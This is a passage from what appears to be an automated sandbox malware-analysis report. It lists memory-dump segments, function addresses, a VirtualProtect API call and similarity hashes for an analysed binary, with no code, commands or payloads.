                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f731217ea9f8f704d0cbe56732fdc500aa125ff806119307986490eef3a747f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 3fdb2582a6fee50b8612c733ffed797f7fbc1b7b1a16fde736f690a0660f0df4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f731217ea9f8f704d0cbe56732fdc500aa125ff806119307986490eef3a747f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3156B2E051259BF7108A14CC819EB7778EB95310F1450BBE88E93240D67C5FC38BA6
                                                                                                                                                                                                                                                                                                Function 00438E20 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 64001f0b2acd8699ba6bb63dade8278e362b6afcc99eba18a2d7af10716f12ec
                                                                                                                                                                                                                                                                                                • Instruction ID: 959cc9230c31591e63b45458d00b5b109799a9c521592869f93e0c5404157b9f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64001f0b2acd8699ba6bb63dade8278e362b6afcc99eba18a2d7af10716f12ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE4197F2E046099BF7108A50DC84AEA7378FBD4310F1541BAE84D9B681D3BC4FC28A62
                                                                                                                                                                                                                                                                                                Function 00438DDC Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00000C70,?,?,004398F4,?,?,?,?,?,00000000,?,0043962C), ref: 00439C9E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0313432ffed0d27c8fc2de188b9f8b803c85bbb3c0cced9e0fe7f866fac2f831
                                                                                                                                                                                                                                                                                                • Instruction ID: 7d134417d5cf3b58ebf2f20ab3cfe2bf1cbf4addf1e85288463b706f11d21e21
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0313432ffed0d27c8fc2de188b9f8b803c85bbb3c0cced9e0fe7f866fac2f831
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B93166F2E056099BF7104650DC85BFA7378EBD4311F2551BAE44D66680D2BD1FC28EA2
                                                                                                                                                                                                                                                                                                Function 004394D5 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1c04d11c75edf4c0478804df301d56424f261a04948507f745152b4363c18dfb
                                                                                                                                                                                                                                                                                                • Instruction ID: ffd961546834629cb9781ea50f6b089ee7ad7b01858337d742662dd2a5356549
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c04d11c75edf4c0478804df301d56424f261a04948507f745152b4363c18dfb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 713177B2E055299BF7108A10CC81AEB77B9EF94300F1950FAE48D53141D67D5FC28F92
                                                                                                                                                                                                                                                                                                Function 004398CA Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e6d0927e0844a32fceeeeeb84cb3f5955536d0e40a5b5b25e2175d4af31a3e8
                                                                                                                                                                                                                                                                                                • Instruction ID: 3a8605b19ce2c47d3694022445aaca801366b191fc3089810cc4219c422979c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6d0927e0844a32fceeeeeb84cb3f5955536d0e40a5b5b25e2175d4af31a3e8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93102B2E056199BFB208A10CC91AEAB778EFC5301F1551FAD48D67281D6785FC28E92
                                                                                                                                                                                                                                                                                                Function 004390AC Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e2e4f8be8850b93d7632264060324575389d572dda48007ff07afd8fbc87b2ac
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a5df1a00f150707abe8f498f5cc8a07a4b713fc45380ce59cf1aa3bff31ac2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2e4f8be8850b93d7632264060324575389d572dda48007ff07afd8fbc87b2ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F63146F3E056059BF7108A50DC85AEA7378EBD4311F2551BAE84D67681D2BC1FC28E62
                                                                                                                                                                                                                                                                                                Function 00439B3F Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ab1e232686f64996957c428aa46097a5dca11d137d69d7a7f7db52e722a72dc7
                                                                                                                                                                                                                                                                                                • Instruction ID: efb2aaa402b8b894119f8764a0cc15061e94d759875b9d6e0f2f5a44f91e3c92
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab1e232686f64996957c428aa46097a5dca11d137d69d7a7f7db52e722a72dc7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B3118B2E016199BFB208A10CC91AEA7775EF85301F1550FAE94D57240D27D5FC18F52
                                                                                                                                                                                                                                                                                                Function 004394EA Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: de5e14736ce1b0675676b5b99ede00c589556290ac527a72a899a351e07207ba
                                                                                                                                                                                                                                                                                                • Instruction ID: c628551df413a5cee7df34e4b3a8cfd67ed3f0b839105bbca45370cffb56c7c8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de5e14736ce1b0675676b5b99ede00c589556290ac527a72a899a351e07207ba
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93178B3E056299BF7108A14CC819EA7779EF94310F1541FAE48DA3181D67C5FC28FA2
                                                                                                                                                                                                                                                                                                Function 004394FB Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
